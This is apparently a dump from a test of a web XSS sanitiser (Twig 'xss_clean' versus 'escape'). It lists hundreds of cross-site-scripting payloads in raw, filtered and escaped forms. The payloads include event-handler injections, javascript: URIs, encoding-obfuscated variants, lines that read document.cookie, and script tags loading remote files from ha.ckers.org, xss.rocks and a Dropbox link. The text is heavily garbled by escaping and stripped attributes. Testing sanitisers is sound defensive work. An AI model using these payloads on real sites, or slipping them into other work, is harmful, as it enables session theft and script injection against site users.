alert(String.fromCharCode(88,83,83))</script>\\r\\n\\\'>><marquee><h1>XSS</h1></marquee>\\r\\n\\\'\\\">><script>alert(\\\'XSS\\\')</script>\\r\\n\\\'\\\">><marquee><h1>XSS</h1></marquee>\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=javascript:alert(\\\'XSS\\\');\\\\\\\">\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http://;URL=javascript:alert(\\\'XSS\\\');\\\\\\\">\\r\\n<script>var var = 1; alert(var)</script>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"javascript:alert(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<?=\\\'<SCRIPT>alert(\\\"XSS\\\")</SCRIPT>\\\'?>\\r\\n<IMG SRC=\\\'vbscript:msgbox(\\\\\\\"XSS\\\\\\\")\\\'>\\r\\n\\\" onfocus=alert(document.domain) \\\"> <\\\"\\r\\n<FRAMESET><FRAME SRC=\\\\\\\"javascript:alert(\\\'XSS\\\');\\\\\\\"></FRAMESET>\\r\\n<STYLE>li {list-style-image: url(\\\\\\\"javascript:alert(\\\'XSS\\\')\\\\\\\");}</STYLE><UL><LI>XSS\\r\\nperl -e \\\'print \\\\\\\"<SCR\\\\0IPT>alert(\\\\\\\"XSS\\\\\\\")</SCR\\\\0IPT>\\\\\\\";\\\' > out\\r\\nperl -e \\\'print \\\\\\\"<IMG SRC=java\\\\0script:alert(\\\\\\\"XSS\\\\\\\")>\\\\\\\";\\\' > out\\r\\n<br size=\\\\\\\"&{alert(\\\'XSS\\\')}\\\\\\\">\\r\\n<scrscriptipt>alert(1)</scrscriptipt>\\r\\n</br style=a:expression(alert())>\\r\\n</script><script>alert(1)</script>\\r\\n\\\"><BODY onload!#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n[color=red width=expression(alert(123))][color]\\r\\n<BASE HREF=\\\"javascript:alert(\\\'XSS\\\');//\\\">\\r\\nExecute(MsgBox(chr(88)&chr(83)&chr(83)))<\\r\\n\\\"></iframe><script>alert(123)</script>

keyword(s): zz

description: <input value=\\\"``=(1)\\\">

document.getElementById(\\\"div2\\\") = document.getElementById(\\\"div1\\\");\\r\\n\\>\\r\\n\\>\\r\\n\\r\\n
x\\r\\n<? foo=\\\">(1)\\\">\\r\\n<! foo=\\\">(1)\\\">\\r\\n</ foo=\\\">(1)\\\">\\r\\n<? foo=\\\"><x foo=\\\'?>(1)\\\'>\\\">\\r\\n<! foo=\\\"[[[Inception]]\\\"><x foo=\\\"]foo>(1)\\\">\\r\\n<% foo><x foo=\\\"%>(1)\\\">\\r\\n<div id=d><x xmlns=\\\"><iframe =(1)\\\"></div> d=d\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img[>\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<a >XXX</a>\\r\\n<img >\\r\\n<img >\\r\\n<title =(1)></title><title title=>\\r\\n<a ></a><img ><img ></a>\\\">\\r\\n<!--[if]>(1)-->\\r\\n<!--[if<img > -->\\></object> <object classid=\\\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\" =\\\"(1)\\\" ><param name=postdomevents /></object>\\r\\n<a >X\\r\\n<style>p[foo=bar{}*{-o-link:\\\'(1)\\\'}{}*{-o-link-source:current}]{color:red};</style>\\r\\n<link rel=stylesheet href=PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\">\\r\\n<h1/=\\\'\\\alert(1)\\\'>\\r\\n<iframe/src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\" >X</a\\r\\nhttp://www.googlealert)\r\\n<a >XYZ</a\\r\\n<img/>alert(String.fromCharCode(49))^__^\\r\\n</style ><input type=\\\"date\\\" =\\\"alert(1)\\\">\\r\\n<form><textarea =\\\'\\\a\\\l\\\e\\\r\\\t(1)\\\'>\\r\\n\\\'>\\r\\n<a >X</a>\\r\\n\\r\\n<style/=<!-- > alert (1)>\\r\\n<///style///><span / =\\\'alert(1)\\\'>SPAN\\r\\n<img/><svg><style>{-o-link-source:\\\'<body/=confirm(1)>\\\'\\r\\n <blink/ =prompt(1)>OnMouseOver {Firefox & Opera}\\r\\n<marquee =\\\'(1)\\\'>^__^\\r\\n<div/>X</div> {IE7}\\r\\n<iframe// src=(1)\\r\\n//<form/action=()><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/=prompt(1) /*iframe/src*/>\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n</font>/<svg><style>{src:\\\'<style/=this.=confirm(1)>\\\'</font>/</style>\\r\\n<a/><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/=prompt(1)\\r\\n</svg>\\\'\\\'<svg>alert(1) {Opera}\\r\\n<a ><button>\\r\\n<div =\\\'alert(1)\\\'>DIV</div>\\r\\n<iframe =\\\"prompt(1)\\\">\\r\\n<a >X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var =\\\"prompt(1)\\\">On Mouse Over</var>\\r\\n<a >Click Here</a>\\r\\n<img >\\r\\n<%<!--\\\'%>alert(1);-->\\r\\n\\\">X</a\\r\\n<iframe/=\\\a\\\l\\\e\\\r\\\t(\\\'\\\a\\\') worksinIE>\\r\\n~\\\'\\\a\\\' ; \\\t\\\h\\\r\\\o\\\w ~ \\\t\\\h\\\i\\\s. \\\a\\\l\\\e\\\r\\\t(~\\\'\\\a\\\')U+\\r\\n</object>\\r\\n<iframe src=\\\"data:text/html,\\\"></iframe>\\r\\n<a >Click Me</a>\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n\\\'>//\\\\\\\\,<\\\'>\\\">\\\">\\\"*\\\"\\r\\n\\\'); alert(\\\'XSS\\r\\nalert(1);\\r\\nalert(\\\'XSS\\\');\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG \\\"\\\"\\\">alert(\\\"XSS\\\")\\\">\\r\\n\\r\\nalert(String.fromCharCode(88,83,83)) \\r\\n<img />\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\\\\\"XSS\\\\\\\")\\\';</style>\\r\\n<? echo(\\\'<scr)\\\'; echo(\\\'ipt>alert(\\\\\\\"XSS\\\\\\\")\\\'); ?>\\r\\n<marquee>alert(\\\'XSS\\\')</marquee>\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n\\\">alert(0)\\r\\n\\r\\n</title>alert(/xss/)\\r\\n</textarea>alert(/xss/)\\r\\n<IMG >\\r\\n<IMG >\\r\\n<font >\\r\\n<img >\\>\\/></a></><img >\\>\\r\\n<iframe<?php echo chr(11)?> =alert(\\\'XSS\\\')></iframe>\\r\\n\\\">><marquee><h1>XSS</h1></marquee>\\r\\n\\\'\\\">>alert(\\\'XSS\\\')\\r\\n\\\'\\\">><marquee><h1>XSS</h1></marquee>\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=(\\\'XSS\\\');\\\\\\\">\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\\\\\">\\r\\nvar var = 1; alert(var)\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<?=\\\'alert(\\\"XSS\\\")\\\'?>\\r\\n<IMG >\\> <\\\"\\r\\n<FRAMESET><FRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"></FRAMESET>\\r\\n<STYLE>li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}</STYLE><UL><LI>XSS\\r\\nperl -e \\\'print \\\\\\\"<SCR\\\\0IPT>alert(\\\\\\\"XSS\\\\\\\")</SCR\\\\0IPT>\\\\\\\";\\\' > out\\r\\nperl -e \\\'print \\\\\\\"<IMG >\\\\\\\";\\\' > >\\r\\n<scrscriptipt>alert(1)</scrscriptipt>\\r\\n</br >\\r\\nalert(1)\\r\\n\\\"><BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n[color=red width=alert(123))][color]\\r\\n<BASE HREF=\\\"(\\\'XSS\\\');//\\\">\\r\\nExecute(MsgBox(chr(88)&chr(83)&chr(83)))<\\r\\n\\\"></iframe>alert(123)

by zz | at 2021-08-19 09:46:16

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\r\\n
\\r\\n
\\r\\n
\\r\\n
\\r\\n
\\r\\n<!--[if gte IE 4]>\\\'\\\"-->\\r\\n<? echo(\\\'alert(\\\"XSS\\\")\\\'); ?>\\r\\n\\>\\>\\>\\>\\>\\r\\n\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\nXSS\\r\\n0\\\\\\\"autofocus/=alert(1)--><video/>\\\"-confirm(3)-\\\"\\r\\nveris-->group<svg/>\\ >\\>[\\\" >\\>\\r\\n\\r\\ntest\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\ >\\/>\\r\\n\\\">

<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\\">123

\\r\\n\\\">

<IFRAME SRC=# ></IFRAME>123

\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# ></IFRAME>\\r\\n\\\">

<IFRAME SRC=# ></IFRAME>123

\\r\\n\\\"></iframe><iframe frameborder=\\\"0\\r\\n\\\">

<IFRAME width=\\\"420\\\" height=\\\"315\\\" SRC=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" ></IFRAME>123

\\r\\n\\\">

<iframe width=\\\"420\\\" height=\\\"315\\\" src=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" allowfullscreen></iframe>123

\\r\\n>

<IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" ></IFRAME>Hover the cursor to the LEFT of this Message

&ParamHeight=250\\r\\n<IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" ></IFRAME>\\r\\n\\\">

<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\\">123

\\r\\n\\\">

<IFRAME SRC=# ></IFRAME>123

\\r\\n<iframe src=http://xss.rocks/scriptlet.html <\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# ></IFRAME>\\r\\n<iframe src=\\\" (1) \\\">\\r\\n<svg><style>{font-family:\\\'<iframe/>\\\'\\r\\n<input/><isindex >\\>\\>\\\">\\/>\\r\\n<svg>\\r\\n<iframe src=)>\\r\\n<form><a >X<img/*/>\\r\\n<img/ >\\r\\n<form><iframe src=\\\"(1)\\\" ;>\\r\\n<a >X</a\\r\\nhttp://www.googlealert)\r\\n<a >XYZ</a\\r\\n<img/>alert(String.fromCharCode(49))^__^\\r\\n</style ><input type=\\\"date\\\" >\\r\\n<form><textarea >\\r\\n\\r\\n<a >X</a>\\r\\n\\r\\n<style/ > alert (1)>\\r\\n<///style///><span / >SPAN\\r\\n<img/><svg><style>{-o-link-source:\\\'<body/>\\\'\\r\\n <blink/ >OnMouseOver {Firefox & Opera}\\r\\n<marquee >^__^\\r\\n<div/>X</div> {IE7}\\r\\n<iframe// src=(1)\\r\\n//<form/action=()><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/ /*iframe/src*/>\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n</font>/<svg><style>{src:\\\'<style/>\\\'</font>/</style>\\r\\n<a/><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/>\\\'\\\'<svg>alert(1) {Opera}\\r\\n<a ><button>\\r\\n<div >DIV</div>\\r\\n<iframe >\\r\\n<a >X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var >On Mouse Over</var>\\r\\n<a >Click Here</a>\\r\\n<img >\\r\\n<%<!--\\\'%>\\r\\n\\r\\n<iframe/src \\\\/\\\\/ value=<><iframe/src=(1)\\r\\n<input type=\\\"text\\\" value=`` <div/>X</div>\\r\\nhttp://www.</iframe>\\r\\n<svg></iframe>\\r\\n<img >\\></object>\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;(1)\\\"/>\\r\\n<math><a >click\\r\\n<embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always>\\r\\n<svg contentScriptType=text/vbs>\\\">X</a\\r\\n<iframe/ worksinIE>\\r\\na=\\\a & /=/\\r\\n\r\\n<object data=\\\alert(1)>\\r\\n\\r\\n<body/ alert(1)>\\r\\n/*\\r\\n<svg> alert(1)\\r\\n<a >ClickMe\\r\\n alert(1) 1=2\\r\\n<div/> style=\\\"x:\\\">\\r\\n<--`<img/> --!>\\>x</button>\\r\\n\\\"><img >\\r\\n<form><button >CLICKME\\r\\n<math><a >click\\r\\n<object data=PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\%(base64)s\\\">\\r\\n<embed src=\\\%(base64)s\\\">

result with twig: {{ xss.xss | escape }}:

<TABLE BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<DIV STYLE=\\\"background-image: url(javascript:alert(\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\">\\r\\n<DIV STYLE=\\\"background-image: url(&#1;javascript:alert(\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"width: expression(alert(\\\'XSS\\\'));\\\">\\r\\n<!--[if gte IE 4]><SCRIPT>alert(\\\'XSS\\\');</SCRIPT><![endif]-->\\r\\n<BASE HREF=\\\"javascript:alert(\\\'XSS\\\');//\\\">\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"></OBJECT>\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\\\'\\\"-->\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>alert(\\\"XSS\\\")</SCRIPT>\\\'); ?>\\r\\n<IMG SRC=\\\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\">\\r\\n<META HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=<SCRIPT>alert(\\\'XSS\\\')</SCRIPT>\\\">\\r\\n<HEAD><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>+ADw-SCRIPT+AD4-alert(\\\'XSS\\\');+ADw-/SCRIPT+AD4-\\r\\n<SCRIPT a=\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT =\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=\\\">\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT \\\"a=\\\'>\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=`>` SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=\\\">\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT>document.write(\\\"<SCRI\\\");</SCRIPT>PT SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<A HREF=\\\"http://66.102.7.147/\\\">XSS</A>\\r\\n0\\\\\\\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>\\\"-confirm(3)-\\\"\\r\\nveris-->group<svg/onload=alert(/XSS/)//\\r\\n#\\\"><img src=M onerror=alert(\\\'XSS\\\');>\\r\\nelement[attribute=\\\'<img src=x onerror=alert(\\\'XSS\\\');>\\r\\n[<blockquote cite=\\\"]\\\">[\\\" onmouseover=\\\"alert(\\\'RVRSH3LL_XSS\\\');\\\" ]\\r\\n%22;alert%28%27RVRSH3LL_XSS%29//\\r\\njavascript:alert%281%29;\\r\\n<w contenteditable id=x onfocus=alert()>\\r\\nalert;pg(\\\"XSS\\\")\\r\\n<svg/onload=%26%23097lert%26lpar;1337)>\\r\\n<script>for((i)in(self))eval(i)(1)</script>\\r\\n<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>\\r\\n<sCR<script>iPt>alert(1)</SCr</script>IPt>\\r\\n<a href=\\\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\\\">test</a>\\r\\n%253Cscript%253Ealert(\\\'XSS\\\')%253C%252Fscript%253E\\r\\n<IMG SRC=x onload=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onafterprint=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onbeforeprint=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onbeforeunload=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onerror=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onhashchange=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onload=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onmessage=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ononline=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onoffline=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onpagehide=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onpageshow=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onpopstate=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onresize=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onstorage=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onunload=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onblur=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onchange=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x oncontextmenu=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x oninput=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x oninvalid=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onreset=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onsearch=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onselect=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onsubmit=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onkeydown=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onkeypress=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onkeyup=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onclick=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondblclick=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onmousedown=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onmousemove=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onmouseout=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onmouseover=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onmouseup=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onmousewheel=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onwheel=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondrag=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondragend=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondragenter=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondragleave=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondragover=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondragstart=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondrop=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onscroll=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x oncopy=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x oncut=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onpaste=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onabort=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x oncanplay=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x oncanplaythrough=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x oncuechange=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ondurationchange=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onemptied=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onended=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onerror=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onloadeddata=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onloadedmetadata=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onloadstart=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onpause=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onplay=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onplaying=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onprogress=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onratechange=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onseeked=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onseeking=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onstalled=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onsuspend=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ontimeupdate=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onvolumechange=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onwaiting=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x onshow=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<IMG SRC=x ontoggle=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow=\\\"alert(1)\\\";\\r\\n<IMG SRC=x onload=\\\"alert(String.fromCharCode(88,83,83))\\\">\\r\\n<INPUT TYPE=\\\"BUTTON\\\" action=\\\"alert(\\\'XSS\\\')\\\"/>\\r\\n\\\"><h1><IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\\">123</h1>\\r\\n\\\"><h1><IFRAME SRC=# onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>123</h1>\\r\\n<IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>\\r\\n\\\"><h1><IFRAME SRC=# onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>123</h1>\\r\\n\\\"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=\\\"0%EF%BB%BF\\r\\n\\\"><h1><IFRAME width=\\\"420\\\" height=\\\"315\\\" SRC=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>123</h1>\\r\\n\\\"><h1><iframe width=\\\"420\\\" height=\\\"315\\\" src=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" allowfullscreen></iframe>123</h1>\\r\\n><h1><IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" onmouseover=\\\"document.location.href=\\\'https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr\\r\\ng\\\'\\\"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250\\r\\n<IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" onload=\\\"alert(document.cookie)\\\"></IFRAME>\\r\\n\\\"><h1><IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\\">123</h1>\\r\\n\\\"><h1><IFRAME SRC=# onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>123</h1>\\r\\n<iframe src=http://xss.rocks/scriptlet.html <\\r\\n<IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>\\r\\n<iframe src=\\\"&Tab;javascript:prompt(1)&Tab;\\\">\\r\\n<svg><style>{font-family&colon;\\\'<iframe/onload=confirm(1)>\\\'\\r\\n<input/onmouseover=\\\"javaSCRIPT&colon;confirm&lpar;1&rpar;\\\"\\r\\n<sVg><scRipt >alert&lpar;1&rpar; {Opera}\\r\\n<img/src=`` onerror=this.onerror=confirm(1) \\r\\n<form><isindex formaction=\\\"javascript&colon;confirm(1)\\\"\\r\\n<img src=``&NewLine; onerror=alert(1)&NewLine;\\r\\n<script/&Tab; src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' /&Tab;></script>\\r\\n<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\\r\\n<iframe/src=\\\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\">\\r\\n<script /**/>/**/alert(1)/**/</script 